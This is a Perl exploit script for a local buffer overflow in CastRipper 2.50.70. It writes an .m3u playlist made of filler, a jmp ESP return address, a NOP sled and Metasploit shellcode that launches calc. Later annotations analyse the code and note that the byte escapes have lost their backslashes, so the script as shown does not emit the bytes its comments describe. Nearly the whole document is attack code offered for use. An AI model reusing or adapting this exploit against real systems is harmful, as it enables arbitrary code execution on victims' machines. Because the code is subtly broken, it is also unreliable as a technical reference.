
# Title : CastRipper 2.50.70 (.m3u) Local Buffer Overflow Exploit
# Published : 2009-05-12
# Author : [0]x80->[H]4x?20r


#!/usr/bin/perl
#[+]--------------------------------------------------------------------------------------[+]#
# CastRipper 2.50.70 (.m3u) Local buffer Overflow Exploit
# By [0]x80->[H]4x?20r
# hashteck[at]Gmail[dot]com
# From Morocco
#[+]--------------------------------------------------------------------------------------[+]#
# program : CastRipper
# version : 2.50.70
# download : http://www.mini-stream.net/castripper/
#[+]--------------------------------------------------------------------------------------[+]#
# Tested Under Win$hit Vista Pro
# After launching the sploit just drag&drop the .m3u file in the Ripper , Enjoy ;)#
# NOTE : if you want to use it under another version of Win32 use jmpfind.exe 
#( available on the net) to find a matching address with which you'll overwrite your EIP .
#[+]--------------------------------------------------------------------------------------[+]#
##################################### Proud to be Moroccan ###################################


# The file written below is the concatenation $junk . $eip . $nops . $shell,
# emitted as one string with no trailing newline (see the layout diagram
# further down).
#
# NOTE(review): every "byte" in this script is spelled `x41`, `xF8`, ... with no
# leading backslash, so as the text stands Perl treats each as an ordinary
# three-character string ("x41" x 17379 is 52137 characters, not 17379 bytes of
# 0x41).  Presumably the backslashes were lost when the page was archived; in
# any case the byte/address comments beside each value describe the author's
# stated intent, not what this code actually emits.
$junk="x41" x 17379;
$eip="xF8x03xB1x76"; # 0x76B103F8 jmp ESP - Kernel32.dll
$nops="x46" x 10;
# win32_exec -  EXITFUNC=seh CMD=calc Size=160 Encoder=PexFnstenvSub http://metasploit.com
# Same caveat as above: these are the author's stated byte values.
$shell =
"x2bxc9x83xe9xdexd9xeexd9x74x24xf4x5bx81x73x13x88".
"xd3x37xccx83xebxfcxe2xf4x74x3bx73xccx88xd3xbcx89".
"xb4x58x4bxc9xf0xd2xd8x47xc7xcbxbcx93xa8xd2xdcx85".
"x03xe7xbcxcdx66xe2xf7x55x24x57xf7xb8x8fx12xfdxc1".
"x89x11xdcx38xb3x87x13xc8xfdx36xbcx93xacxd2xdcxaa".
"x03xdfx7cx47xd7xcfx36x27x03xcfxbcxcdx63x5ax6bxe8".
"x8cx10x06x0cxecx58x77xfcx0dx13x4fxc0x03x93x3bx47".
"xf8xcfx9ax47xe0xdbxdcxc5x03x53x87xccx88xd3xbcxa4".
"xb4x8cx06x3axe8x85xbex34x0bx13x4cx9cxe0x23xbdxc8".
"xd7xbbxafx32x02xddx60x33x6fxb0x56xa0xebxd3x37xcc";

# | --------------Junk-------------|-EIP-|----Nops----|-----------Shellcode----------|
# File output.  Two-argument open on a bareword handle, in append mode (">>"),
# with the return value never checked; the script has no `use strict` or
# `use warnings`, so a failed open makes the print below fail silently and
# "Done" is reported regardless.  Because the mode is append, each run adds
# another copy of the payload to the end of an existing Exploit.m3u.
#
# From an analysis standpoint the artifact is a one-line .m3u whose only
# "entry" is the filler above rather than a path or URL, i.e. an oversized
# playlist line handed to a parser that does not bound its copy.
open(m3u,">>Exploit.m3u");
print m3u $junk.$eip.$nops.$shell;
print "[+] Done !! [+]";
close(m3u);

# www.Syue.com [2009-05-12]